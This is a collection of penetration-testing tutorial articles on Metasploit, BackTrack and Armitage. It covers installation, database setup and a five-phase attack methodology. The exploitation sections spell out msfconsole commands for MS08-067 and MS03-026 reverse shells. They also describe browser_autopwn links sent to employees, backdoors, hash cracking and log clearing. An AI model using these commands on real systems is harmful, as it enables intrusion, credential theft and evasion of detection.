Download and Installation The first step in our process is to download and install Metasploit. Although there is a Windows version, I will focus on the Linux version because of its greater flexibility and capability. Let’s walk through the download and installation on my favorite Linux distro, Ubuntu. To install the latest version of the Metasploit 4.7 Framework (MSF4.7) on Ubuntu 14.04 use the following commands. This downloads and installs the generic Linux binary which comes bundled with all the necessary components you need for Metasploit to install and run. This should work for most users and is the easiest and quickest way to get the Metasploit Framework running under Ubuntu and other Debian-based Linux distros. First open a terminal window and type: wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run If you’re installing on a 64-bit build of Ubuntu, use this instead: wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run This downloads the current version of the Metasploit framework via wget. Before you can run the installer, you need to make it executable. In the terminal, you must change the mode to execute (x) for Metasploit: chmod +x metasploit-latest-linux-installer.run
And now execute the installer by getting root privileges by typing sudo and ./ with the name of our package: sudo ./ metasploit-latest-linux-installer.run
Be patient now; it will take Metasploit a few minutes to install and build your database. After it’s done, you are ready to run Metasploit. Simply type: msfconsole
Now let’s install WebSploit Toolkit • First download WebSploit toolkit from http://sourceforge.net/projects/websploit/ • Now unzip the file folder and copied WebSploit V.2.0.5 Toolkit in the directory web under pentest • Now change the permission of WebSploit file in WebSploit folder. Right click on websploit file and select properties Select the Permission tab and click on Allow executing file as program now click on close.
28
SECRETS OF METASPLOIT
Configuring Metasploit on Windows Installation of the Metasploit framework on Windows is simple and requires almost no effort. The framework installer can be downloaded from the Metasploit official website (http://www.metasploit.com/download). In this article, we will learn how to configure Metasploit on the Windows operating system. You will notice that there are two types of installer available for Windows. It is recommended to download the complete installer of the Metasploit framework, which contains the console and all other relevant dependencies, along with the database and runtime setup. In case you already have a configured database that you want to use for the framework as well, Then you can go for the mini installer of the framework, which only installs the console and dependencies. Once you have completed downloading the installer, simply run it and sit back. It will automatically install all the relevant components and set up the database for you. Once the installation is complete, you can access the framework through various shortcuts created by the installer. You will find that the installer has created lots of shortcuts for you. Most of the things are click-and-go in a Windows environment. Some of the options you will find are Metasploit web, cmd console, Metasploit update, and so on.
Installing Metasploit with BackTrack 5 R3 BackTrack is the most popular operating system for security professionals for two reasons. First, it has all the popular penetration testing tools preinstalled in it, so it reduces the cost of a separate installation. Secondly, it is a Linux-based operating system, which makes it less Prone to virus attacks and provides more stability during penetration testing. It saves you time from installing relevant components and tools, and who knows when you may encounter an unknown error during the installation process. So, let’s move on with installation of BackTrack 5 R3. Either you can have a separate installation of BackTrack on your hard disk or you can also use it over a host on a virtual machine. The installation process is simple and the same as installing any Linux-based operating system. The following steps show the entire process of installing BackTrack 5 R3: • When booting the BackTrack OS, you will be asked to enter the username and password. The default username for the root user is root and the password is toor. • Upon successful login, you can either work over the command line or enter startx to enter in the GUI mode. • You can either start the Metasploit framework from the Applications menu or from the command line. To launch Metasploit from the Applications menu, go to Applications | BackTrack | Exploitation Tools | Network Exploitation Tools | Metasploit Framework, as shown in the following Figure 1:
29
SECRETS OF METASPLOIT
Figure 1. Installing Metasploit with BackTrack 5 R3 Upgrading from R2 to R3
For those who don’t want to start with the new installation, they can easily upgrade their existing installation of R2 to R3. First, we must make sure our current system is fully updated: apt – get update && apt – get dist upgrade
The execution of this command will result in the installation of the new tools that have been added for R3. Keeping in mind the system architecture, one must choose the right one. 32-bit tools
For installation on a 32-bit system, use the following command: apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss- autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc- check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
bit tools
For installation on a 64-bit system, use the following command: apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentestframework fern-wifi-cracker powersploit webhandler
30
SECRETS OF METASPLOIT
Installing and configuring PostgreSQL in BackTrack 5 R3 An important feature of Metasploit is the presence of databases, which you can use to store your penetration testing results. Any penetration test consists of lots of information and can run for several days, so it becomes essential to store the intermediate results and findings. A good penetration testing tool should have proper database integration to store the results quickly and efficiently. In this article, we will be dealing with the installation and configuration process of a database in BackTrack 5 R3. Metasploit comes with PostgreSQL as the default database. Let us first check out the default settings of the PostgreSQL database. We will have to navigate to database.yml, located under opt/framework3/config. To do this, run the following command: root@bt:~# cd /opt/metasploit/config root@bt:/opt/metasploit/config# cat database.yml production: adapter: postgresql database: msf3 username: msf3 password: 8b826ac0 host: 127.0.0.1 port: 7175 pool: 75 timeout: 5
Notice the default username, password, and default database that has been created. Note down these values, as they will be required further along. You can also change these values according to your preference, as well. Now, our job is to connect the database and start using it. Let us launch the msfconsole interface and see how we can set up the databases and store our results. Let us first check the available database drivers: msf > db_driver [*]Active Driver: postgresql [*]Available: postgresql, mysql
To connect the driver to msfconsle, we will be using the db_connect command. This command will be executed using the following syntax: db_connect username:password@hostIP:port number/database_name
Here, we will use the same default values of the username, password, database name, and port number, which we just noted from the database.yml file: msf > db_connect msf3:[email protected]:7175/msf3
On successful execution of the command, our database is fully configured. Getting an error while connecting to the database
There are chances of an error while trying to establish the connection. There are two things to keep in mind if any error arises: • Check the db _ driver and db _ connect commands and make sure that you are using the correct combination of the database. • Use start/etc/init.d to start the database service and then try connecting it. If the error still prevails, we can reinstall the database and associated libraries using the following commands: msf> gem install postgres msf> apt-get install libpq-dev
31
SECRETS OF METASPLOIT Deleting the database
At anytime, you can drop the created database and start again to store fresh results. The following command can be executed for deleting the database: msf> db_destroy msf3:[email protected]:7175/msf3 Database “msf3” dropped. msf>
Using the database to store the penetration testing results Let us now learn how we can use our configured database to store our results of the penetration tests. If you have successfully executed the previous article, you are all set to use the database for storing the results. Enter the help command in msfconsole to have a quick look at the important database commands available to us. Let us start with a quick example. The db_nmap command stores the results of the port scan directly into the database, along with all relevant information. Launch a simple Nmap scan on the target machine to see how it works: msf [*] [*] [*] [*] [*] [*] [*]
> db_nmap 192.168.56.102 Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-10-04 20:03 IST Nmap: Nmap scan report for 192.168.56.102 [*] Nmap: Host is up (0.0012s latency) Nmap: Not shown: 997 closed ports [*] Nmap: PORT STATE SERVICE Nmap: 135/tcp open msrpc netbios-ssn [*] Nmap: 445/tcp open microsoft-ds Nmap: 139/tcp open Nmap: MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems) Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.94 seconds
As we can see, Nmap has produced the scan results and it will automatically populate the msf3 database that we are using. We can also use the –oX parameter in the Nmap scan to store the result in XML format. This will be very beneficial for us to import the scan results in other third- party software, such as the Dradis framework, which we will be analyzing in the next chapter: msf > nmap 192.168.56.102 –A -oX report [*] exec: nmap 192.168.56.102 –A -oX report Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-10-05 11:57 IST Nmap scan report for 192.168.56.102 Host is up (0.0032s latency) Not shown: 997 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp openmicrosoft-ds MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems) Nmap done: 1 IP address (1 host up) scanned in 0.76 seconds
Here, report is the name of the file where our scanned result will be stored.
Now let’s try to hack our victim Method 1 Now open your backtrack terminal and type cd /pentest/web/websploit ./websploit
32
SECRETS OF METASPLOIT Step 1: choose option 3 “Automatic Exploiter” Step 2: choose option 1 “Service Autopwn” wsf: Autopwn > Enter Target IP Address: 192.168.1.56 (IP Address of Victim) We will see that port 445 is open so we will try to use the netapi exploit. The microsoft-ds are a very common service in Windows machines. Most of the servers will have this service enabled so it will be very easy to exploit them except if they are using a firewall that filters the port 445. Step 3: Type “Search netapi” command in the console, this command will search for all the exploit modules with the pattern “netapi” Step 4: type use exploit/windows/smb/ms08_067_netapi Msf Msf Msf Msf
exploit exploit exploit exploit
(ms08_067_netapi)>set payload windows/meterpreter/reverse_tcp (ms08_067_netapi)>set lhost 192.168.1.55 (IP of Local Host) (ms08_067_netapi)>set rhost 192.168.1.56 (IP of Local Host) (ms08_067_netapi)>exploit
Method 2 In this method we will hack into the victim machine by using the RPC DCOM. It’s a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft’s comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system. Step 1: Open the the Metasploit console msfconsole
Be patient, it takes awhile for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads. Step 2: Find the Exploit
Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type: msf > search dcom
Step 3: Set the Exploit
Now let’s tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/ dcerpc/ms03_026_dcom. msf > use exploit/windows/dcerpc/ms03_026_dcom
Note that the prompt has changed and now reflects our chosen exploit. Step 4: Set the Options
Now that we’ve chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit. msf > show options
33
SECRETS OF METASPLOIT Step 5: Set Remote Host
Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we’re attacking. In our case, it’s 192.168.1.56. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135. msf > set RHOST 192.168.1.56
Step 6: Show Payloads
Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt: msf > show payloads
Step 7: Set Payload
Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command. msf > set PAYLOAD generic/shell_reverse_tcp
Step 8: Set Local Host
Now that we’ve chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our target system has an IP address of 192.168.1.55. Use the actual IP address of the system you are attacking. Tools such a nmap, can help you obtain IP addresses. msf > set LHOST 192.168.1.55
Step 9: Exploit
Now we command Metasploit to exploit the system: msf > exploit
Step 10: Open a Shell on the Hacked System
Type the command sessions –i 1 to open a command shell on the XP system that will appear on your Metasploit console. sessions –i 1
To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own! C: >dir
Summary In this article, we have learned how to perform a network vulnerability assessment by using Metasploit tool kit.
Resources
• BackTrack Linux: www.backtrack-linux.org • Metasploit: www.metasploit.com
About the Author
Maher Abdelshkour is a Sr. Network Engineer and Information Security Analyst III in a large Company for the past 16 years, in the field of Information Technology with extensive network engineering, administration, and troubleshooting experience in Enterprise and Service Provider networks. He is an expert in intrusion detection systems, Penetration Testing and in designing systems to meet externally defined security standards.
34
SECRETS OF METASPLOIT
Multiphase Penetration Testing: Using BackTrack Linux, Metasploit, and Armitage by Lance Cleghorn, Associate of ISC2: CISSP The EC Council identifies five stages of attack that are common to cyber penetration. [1] These stages of attack may be used to categorize incidences where a network or host has been compromised. Considering that these stages are common to real attacks, they are used by ethical hackers to conduct penetration testing. An ethical hacker, or white-hat hacker, may use these steps in order or may selectively choose the steps that work best for their particular vulnerability. [2] When a penetration tester begins to examine a target they often enter the first phase of attack the reconnaissance phase. In this first phase of attack, the attacker or tester tries to discover as much information about the victim as possible. In some cases this phase may involve choosing a target if there is no specific target given. (Penetration testers are often given a target, whereas attackers must decide on one.) [5] This phase may involve using search engines or other Internet based utilities to learn about the target. [1] After a target has been chosen the tester must attempt to enumerate the target as much as possible. This enumeration is referred to by the EC Council as the scanning phase. [1] While enumeration does occur to some extent in the reconnaissance phase it is in the scanning phase that enumeration occurs the most. The tester will try and uncover detailed information about services by viewing banners presented when ports are presented with requests. [4] This phase also may involve scanning a large target to identify a smaller subset of vulnerable nodes. [8] After the tester has enumerated targets in the scanning phase they begin to plan and preform the third phase, the gaining access phase. [1] In the gaining access phase the tester will plan a strategy to attack targets and compromise confidentiality and integrity. The tester will need to confirm the level of overtness they are comfortable with; based on this level of comfort the tester will begin to attack the vulnerable nodes and services. This phase is considered complete when the tester has a foothold in the target. [1] The tester may choose to segment this phase into a second part where the tester spreads and expands the foothold; alternatively the tester could complete all phases and begin again in order to expand the foothold. After establishing an initial foothold in the victim, the tester must aim to maintain that access for a long term compromise. In a real world compromise the attacker is aiming to dig in and capture data that crosses through the victim, maintaining access is the phase where the tester solidifies their grip on the target. [12] In this phase the tester brings tools into the victim and sets up backdoor services that the tester can use to bypass authentication mechanisms. The tester’s primary goal in this phase is to make it easier to access the victim, and also to make access seem more legitimate by adding valid credentials and impersonating legitimate usage. [4] In the final fifth phase the tester works to cover up the evidence that a vulnerability has been exploited and an attacker gained access. [1] There are several motivations for ensuring that this phase is accomplished correctly. In a real attack scenario the attacker will wish to destroy evidence to avoid being detected, and if detected to avoid prosecution. [4] The tester will delete logs and try to manipulate detection methods to not report the compromise. The EC Council refers to the final phase of the multiphase attack as the covering tracks phase. [1]
36
SECRETS OF METASPLOIT
Metasploit, Armitage, and BackTrack Metasploit was designed as a framework that penetration testers could use to load exploits into and conduct tests against vulnerabilities. [9] The Metasploit framework is coded and hosted by the security organization Rapid7 and is currently on version 4.6. [9] The framework is continually updated with new and modified modules that may be executed to find and test vulnerabilities. The framework is made up of almost a dozen command line utilities that may be used in conjunction. Considering that the framework is command line based and requires quite a substantial learning curve Strategic Cyber LLC designed the Armitage graphical user interface (GUI). [3] Armitage is a frontend for the Metasploit framework and can be used to organize and execute a multiphase penetration test. Many security professionals new to the field of penetration testing prefer to learn the Metasploit framework through the Armitage GUI. [5] While there are some functions of the Metasploit framework that may require you to delve into the command line, many of the phases of attack can be accomplished through Armitage. Many veterans of the security penetration testing field have acknowledged that penetration testers should utilize GUIs like Armitage because it is more similar to the utilities used by actual attackers. [4] Both Metasploit and Armitage have come as standard installs in the BackTrack distribution of Linux since version 5. BackTrack Linux is widely considered the operating system of choice for penetration testers. [5] The operating system includes a plethora of utilities to aid in preforming penetration tests. An experienced user is often able to use the distribution to conduct a full multiphase penetration test without having to access the nternet to download additional tools or documentation. BackTrack is currently on Version 5 revision number 3, although this may be the last revision to use the name BackTrack as developers intend to have the next version be referred to as Kali Linux.
Reconnaissance Phase Considering that many penetration testers know their target prior to beginning a test, the reconnaissance phase is largely limited to sniffing the network. BackTrack includes several options for sniffing traffic as shown in Figure 1. Wireshark is an industry favorite because of the sophistication of the GUI. A tester can leverage Wireshark or a comparable network monitor to capture traffic passively as it passes through from node to node. [8] A packet capture is a treasure trove of information for a skilled penetration tester. The tester can scan and filter a packet capture to look for vulnerable services and even begin to capture usernames, hostnames, and in some cases passwords.
Figure 1. BackTrack Sniffing Tools Wireshark and other sniffer programs work by placing the network interface card (NIC) into promiscuous mode. In normal operation the NIC accepts traffic addressed to the address it has and discards everything else, in promiscuous mode the NIC accepts all traffic. A tester using Wireshark can design specific filters to 37
SECRETS OF METASPLOIT look for important information in the packet capture; the tester may also choose to run the packet capture through a set of Snort rules to look for vulnerabilities. Snort is an open source intrusion detection system where an administrator can write rules to look for traffic patterns. [11] Snort is a more robust solution for traffic pattern matching than Wireshark and thus the two may be used in conjunction to perform the reconnaissance phase of an attack. [11] At this point in the multiphase attack, the tester should have an idea of vulnerable services or nodes and ideally some credentials. The tester should not skip this phase; however, they should also not spend too much time in this phase as other phases are more likely to yield greater benefits.
Scanning Phase In the scanning phase Metasploit and Armitage begin to become more prolific in the penetration testing process. Nmap and many other enumeration modules are provided in the Metasploit framework and Armitage can assist in organizing information garnered in this phase. Nmap is a utility that has been used by networking professionals for many years and is preferred because of its simplicity and robust options. [4] Figure 2 shows the enumeration modules available in the Metasploit framework.
Figure 2. Armitage Enumeration Modules Many testers wish to scan the network using a light ping sweep or in a less secure network a service scan. Nmap can provide both of these options as well as options for avoiding intrusion detection and prevention systems. Nmap is an extraordinary utility for enumerating the Internet protocol stack, Metasploit and particularly Armitage are able to store and utilize the outputs from Nmap. After enumerating the addressing
38
SECRETS OF METASPLOIT schemes and services the tester is better able to target particular parts of the network, and the tester may begin to map the target network. A good penetration tester should feel comfortable with making use of all the tools available to them. Figure 3 shows the BackTrack utilities for scanning and enumeration that may be used by a penetration tester. Nessus is a vulnerability scanner used by the United States Department of Defense and trusted by many penetration testers. [4] Nessus results and other standard scanning formats may also be imported into Armitage to identify hosts, services, and vulnerabilities. The tester should have a solid plan at this point with prime targets in mind and a list of attacks to perform in the third phase of attack.
Figure 3. BackTrack Scanning and Enumeration Tools
Gaining Access The third phase of the multiphase attack is where testers or attackers cross a line and gain access to nodes in an unauthorized manner. The tester must balance conducting a successful penetration test and maintaining the integrity of a client’s network. Clients have to weigh the benefit of a real world penetration test with the potential harm it could do to their production network. A talented penetration tester should understand the limits of their tools, and at what point they become a threat to the availability of the production network. The third phase also represents a choice for the penetration tester. The multiphase attack methodology can be used as a one pass method where the tester only goes through the phases once or it can be conducted multiple times throughout the areas of the network. If the tester chooses to only work through the phases once, the third phase of gaining access should be divided into two subsections. In the first subsection the tester will try and gain access and in the second subsection the tester will spread to all the targets identified in the scanning phase. Deciding between working the phases once and going through them multiple times can depend on the target network itself or the tester’s personal preferences. A larger network that is easily devisable into smaller sections may be more effectively tested by using the multiphase approach more than once. In either case the tester must consider using a compromised host as a Launchpad for further exploit. [6] This consideration must be carefully evaluated by a tester because it may skew results. A vulnerability may only be exploitable if another host has already been compromised. [6] The tester should always denote Launchpad tests in a final report and make sure the client understands the methodology behind the tests. The tester must always consider that an attacker will utilize any method available to them and certainly leverage a Launchpad scenario to gain access. In this phase the tester will begin running exploits against the vulnerabilities identified in the scanning phase. Metasploit includes modules that can perform a wide array of attacks; in order to fully gain access the tester should be able to prove access to the confidentiality of a system or a set of data. [10] The tester can choose from an array of attacks, a brute force may be appropriate for a telnet service where as a directory traversal
39
SECRETS OF METASPLOIT attack may be best on an FTP or HTTP web server. Choosing the proper exploits to use in order to gain access is an essential part of penetration testing. If the tester runs too wide a variety of exploits they increase the risk of being detected and prevented. The tester must rely heavily on information from the first two phases in order to choose the exploits with the highest chance of success. Deciding on a proper payload is another key factor in the gaining access phase. The tester may only get one payload to the target, and deciding if that payload should simply alert on a success or attempt to fully compromise the host is important. Going with too strong of a payload that does too much may guarantee detection by a host-based defense mechanism; conversely some exploits by their very nature only work once before crashing a service so a conservative payload may cost the tester a successful access. Metasploit has a custom shell environment called Meterpreter that may be packaged as a payload, many testers choose this payload because it has a small footprint, is very versatile, and is loaded with penetration testing functionality. [7]
Maintaining Access Once the tester has gained the initial foothold in the target network the maintaining access phase begins where the tester tries to solidify their grip on the target. In the maintaining access phase the Meterpreter shell environment becomes much more important. Meterpreter has options and settings that can be manipulated directly from the Armitage GUI. Armitage can use Meterpreter to import additional tools to the victim and set up backdoors. Netcat is a backdoor utility that can easily be imported and set up using Meterpreter. There are many other utilities that can also be imported to create a backdoor. [4] Rather than choosing to set up a malicious backdoor service experienced penetration testers often try to emulate legitimate traffic as much as possible, one way to effectively masquerade as an authorized user is to obtain valid credentials. Valid credentials are arguably some of the most important information a penetration testers or attacker can uncover. Meterpreter and Armitage have some options for obtaining sets of valid credentials. Meterpreter is best designed to exploit hosts running Windows operating systems, while Meterpreter can run on Linux and UNIX based hosts, it is more limited than on a Windows host. [7] Meterpreter is able to export Windows LM Hashes directly into password cracking utilities, the shell can also export Linux shadow files but it may require more interaction from the penetration tester. For Windows targets Armitage can accept LM Hashes from Meterpreter and begin to directly crack them in John the Ripper a popular password cracking utility. Figure 4 shows Armitage cracking passwords from Meterpreter using John the Ripper. The unified interface allows for penetration testing optimization and organization of important information. A penetration tester must consider that the specific vulnerability they used to compromise the target may eventually be patched and the objective of the maintaining access phase is to have other options for access.
Figure 4. Armitage Password Cracking
Covering Tracks In the final phase of penetration testing, the tester should attempt to cover up the evidence of the compromise ever occurring. A penetration tester must take extra consideration during this phase; the tester does not want to remove information that could be valuable in explaining and reporting the test to the client. A real world attacker would not be so kind as to refrain from covering their tracks but the penetration tester may need that information as a teaching tool. One method that penetration testers may find valuable is to back up logs
40
SECRETS OF METASPLOIT and other information prior to deleting them, this way the client’s IT staff may be evaluated on their forensic abilities, and log information is still available to show testing results. Meterpreter includes a particularly useful script for clearing Windows logs. The script (log.clear) can be executed from a Meterpreter shell environment. [7] By default the script only clears the system event log; however, the script can be configured to clear all logs. The covering tracks phase may seem straightforward, but it can be deceptively difficult to accomplish. One way to make the covering tracks phase easier to accomplish is to work the phases while considering them all in as new assets become available.
Working the Phases Holistically The phases are designed in a chronological order, but they do not have to always be carried out in that direct order. There are many cases where considering the phases as a whole will yield benefits, an experienced penetration tester is able to make decisions during the test that will positively impact the later actions in the test. [5] Taking for example the covering tracks phase, this phase may be accomplished more effectively if logging does not occur. In the third phase, gaining access, the penetration tester can utilize scripts built into Metasploit to disable Anti-Virus and Firewalls on compromised hosts. Some actions come with experience, but a skillful penetration tester can take some steps to perform a better test. At the beginning and end of each phase the penetration tester should consider what new options are now available and if these options open any new opportunities. The tester should evaluate the phases that come before and after the current phase; any new options that could improve the other phases should be evaluated and pursued.
Conclusions A penetration tester is well served by putting a methodology to their testing strategy. Much like networking professionals utilize the OSI model to organize and troubleshoot networking issues, the penetration tester can utilize the EC Council five phase attack plan to organize the penetration test. [1,8] The five phases must be considered chronologically as they were designed, but the phases may best be utilized if evaluated holistically. Working through each phase carefully while continually looking at the testing plan as a whole, is the most effective way to leverage the five phase model. A penetration tester’s tool kit should be an extension of the tester themselves. Knowing what utilities are available to the tester and using those tools to their full potential is essential. BackTrack Linux is a distribution designed specifically for penetration testers, the tools contained in BackTrack are designed to accomplish a full multiphase penetration test. [5] Metasploit and the accompanying Armitage GUI are two key tools in a skilled penetration tester’s tool kit. [3,9] The robustness of Metasploit and the organization capabilities of Armitage make these tools stand out among alternatives. Tools will change, but a strong methodology will stay current through changes in technology. A good penetration tester works to understand the resources available to them and how these resources can be applied effectively in each phase. Carefully planning a penetration test can occur prior to ever receiving a job, while the target does change applicable tools a good penetration tester can prepare for many different scenarios. Practicing using lab environments and virtual technologies will assist a tester in compiling a strong tool kit. The best penetration tester prepares, and is interested in continually improving their craft through practice.
About the Author
Lance Cleghorn A North Carolina native received a Bachelor of Science degree in Information Technology from East Carolina University. Graduating Suma Cum Laude Lance completed his undergraduate degree in 2012. As an undergraduate student Lance concentrated in Cisco networking technology. Lance is currently pursuing a Master of Science in Information Security at East Carolina University. Lance holds several major industry certifications including the Associate of ISC2 towards a CISSP, CCNP, CompTIA Security+, EMCISA, and MCP.
41
SECRETS OF METASPLOIT
Pentesting Windows using Metasploit Framework by Omkar Prakash Joshi The Metasploit Project is a computer security project that provides information about security vulnerabilities and resource to penetration testing and IDS signature development. Its well-known sub-project is the open source Metasploit Framework (MSF), a tool for developing and executing exploit code against a remote (target) machine. Other important sub-projects include the Opcode Database, shell code archive etc. The Metasploit Project is also well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework. The Metasploit Framework is both a penetration testing system and a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
Lab Setup In this I am going to demonstrate all attacks in virtual environment. I am going to use VMware Workstation for virtual demonstration. In this workstation I have created 2 virtual machines as: • Attacker Machine (Kali Linux) • Client or victim machine (Windows XP Professional) All this demonstration will be in virtual environment which is VMware Workstation 10.
History Metasploit was created by HD Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions. Like comparable commercial products such as Immunity’s Canvas or Core Security Technologies’ Core Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities.
Metasploit Framework (MSF) MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins. The MSF is far more than just a collection of exploits, it’s an infrastructure that you can build upon and utilize for your custom needs. 42
SECRETS OF METASPLOIT
Metasploit Terms Exploit – to take advantage of a security flaw within a system, network, or application. Payload – code that our victim computer to execute by the metasploit framework. Module – a small piece of code that can be added to the metasploit framework to execute an attack. Shellcode – a small piece of code used as a payload.
MSFconsole Msfconsole is an all-in-one interface to most of the features in metasploit. Msfconsole can be used to launch attacks, creating listeners, and much, much more. I am going to use msfconsole for various attacks. To launch console command is – msfconsole
Figure 1. Running msfconsole command
MSFcli Msfcli is another way to access the metasploit framework but focuses more on scripting and interpretability with other console-based tools. To view the msfcli help command is – msfcli -h.
Figure 2. Listing help for msfcli 43
SECRETS OF METASPLOIT Now I am going to do a little practice on msfcli. Whenever learning metasploit and if you get stuck, you can see the options in a module by adding the letter O to the end of the line. E.g. I am using windows/smb/ ms08_067_netapi exploit to perform attack on windows based machines as,
Figure 3. Listing options of exploit This module requires three options: RHOST, RPORT, and SMBPIPE. Adding p to the end allows us to see what payloads we can use. It will list out all the payloads present in framework. It’s better to keep updated your framework so that you can use or practice on latest exploits & payloads to perform penetration testing or security assessment.
Figure 4. Setting up RHOST We can run our exploit by selecting a payload, fill out the options, and run it by passing the letter E to the end of the msfcli argument string. Right now I am selecting windows/shell/bind_tcp payload as:
Figure 5. Setting up the payload 44
SECRETS OF METASPLOIT Once it has done with all steps, it will exploit on target machine which is windows XP based & will gives you meterpreter session. Now you will be able to access target machine without knowing to target. MSFpayload The msfpayload component of metasploit that generates shellcode, and executables. Shellcode can be generated in many formats including C, Ruby, JavaScript and even Visual Basic. Each output will be useful in various situations. Just like msfcli, if you need to find out the required options, append the letter O on the command line.
Figure 6. Listing out options for payload
Exploiting with browser_autopwn Nowadays due to firewall restrictions and patch management policies exploitation of systems has become much more difficult. However one of the most efficient way is the use of client-side attacks. Client side attacks requires the user interaction and in most of the cases can be used through social engineering engagements. An employee which will not have the necessary knowledge to understand the risks of opening untrusted links can help an attacker to exploit any internal systems. Also the fact that browsers are not patched as often as operating systems makes the problem bigger. The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits. When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open. In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module. I will select browser_autopwn auxiliary using msfconsole as,
Figure 7. Selecting auxiliary browser_autopwn
45
SECRETS OF METASPLOIT Now I will set up the LHOST with our IP address (Host IP), the SRVPORT with the port 80 (otherwise the link that we have to send to the user must me in the format IP:8080) and the URIPATH with / in order to prevent metasploit to set up random URL’s.
Figure 8. Listing out & setting options After the execution of this module we will notice that different exploits for a variety of browsers will start loading to our web server.
Figure 9. Running auxiliary Now we can share the link through our email to our client employees. If any user opens the malicious link, the autopwn module will try all these exploits in order to see if it can break into the client. If the browser is vulnerable to any of these exploits meterpreter sessions will open. This can be done within network easily if we will be able to redirect any of the website to this malicious IP address using DNS poisoning or other techniques it is possible.
46
SECRETS OF METASPLOIT
Figure 10. Listing out & selecting session ID
Figure 11. Meterpreter session of windows In this way we can do penetration testing or exploitation over windows OS using metasploit framework.
Conclusion Most of the organizations are behind proxy firewalls, so only the port 80 is allowed. From the other hand many employees are using social networks these days for various reasons. An attacker can exploit that and send malicious links through the social networks to users so the use of this attack can be very effective against companies as it contains exploits for most of the popular browsers and it only requires the mistake of one person in order to be successful. Metasploit Browser Autopwn module is the proof of how dangerous is to open links that are coming from untrusted sources.
References
• http://en.wikipedia.org/wiki/Metasploit_Project • http://pentestlab.wordpress.com/2012/04/23/metasploit-browser-autopwn/
About the Author
CEH, CHFI, ECSA/LPT, ISO 27001 LA, Cyber Forensic Investigator, Digital Evidence Analyst, Information Security Consultant & Researcher I have been working with IT field for the last year. I am independent security researcher. I acquired knowledge & experience in Computer & Mobile Forensics as well as Information Security & Ethical Hacking Training. I have acquired several certifications like CEH, CHFI, ECSA/LPT, ISO27001 Lead Auditor, and Cyber Crime Investigator. I give training to corporate as well as students in Mobile & Computer Forensics. I am currently working in Fluxonix Corporation, Pune as Knowledge Engineer Manager – Computer Forensics. Published 3 articles related to Android-iOS hacking & forensic in International Magazine. For more my profile on Facebook – https://www.facebook.com/omkar.joshi.10690 & on LinkedIn – http://in.linkedin.com/pub/omkar-joshi/25/4a6/357 & my email ID – [email protected]
47
SECRETS OF METASPLOIT
